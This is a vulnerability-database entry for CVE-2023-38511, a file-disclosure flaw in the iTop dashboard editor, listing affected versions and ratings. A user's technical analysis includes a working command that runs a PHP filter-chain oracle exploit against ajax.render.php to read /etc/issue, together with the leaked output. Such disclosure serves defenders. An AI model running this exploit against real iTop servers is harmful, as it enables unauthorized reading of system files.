Attacker Value
Moderate
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
1

CVE-2023-38511

Disclosure Date: April 15, 2024
CVE-2023-38511
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

iTop is an IT service management platform. Dashboard editor : can load multiple files and URL, and full path disclosure on dashboard config file. This vulnerability is fixed in 3.0.4 and 3.1.1.

Add Assessment

1
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Medium
Common in enterpriseEasy to weaponizeVulnerable in default configurationAuthenticated
Technical Analysis

php_filter_chains_oracle_exploit makes it easy to wayponize.

$ python3 filters_chain_oracle_exploit.py --target http://localhost/pages/ajax.render.php --headers '{"Cookie":"itop-bf***6g"}' --data '{"operation":"dashboard_editor", "id":"999999999"}' --parameter file --file /etc/issue
[*] Additionnal data used : {"operation":"dashboard_editor", "id":"999999999"}
[*] Additionnal headers used : {"Cookie":"itop-bf***6g"}
[+] File /etc/issue leak is finished!
b'RGViaWFuIEdOVS9MaW51eCAxMSBcbiBcbAoK'
Debian GNU/Linux 11 \n \l
Log in to Add Reply
CVSS V3 Severity and Metrics
Base Score:
None
Impact Score:
Unknown
Exploitability Score:
Unknown
Vector:
Unknown
Attack Vector (AV):
Unknown
Attack Complexity (AC):
Unknown
Privileges Required (PR):
Unknown
User Interaction (UI):
Unknown
Scope (S):
Unknown
Confidentiality (C):
Unknown
Integrity (I):
Unknown
Availability (A):
Unknown

General Information

Offensive Application
Unknown
Utility Class
Unknown
Ports
Unknown
OS
Unknown
Vulnerable Versions
iTop >= 3.0.0, < 3.0.4
iTop >= 3.1.0, < 3.1.1
Prerequisites
Unknown
Discovered By
Unknown
PoC Author
Unknown
Metasploit Module
Unknown
Reporter
Unknown

Vendors

  • Combodo

Products

  • iTop
Technical Analysis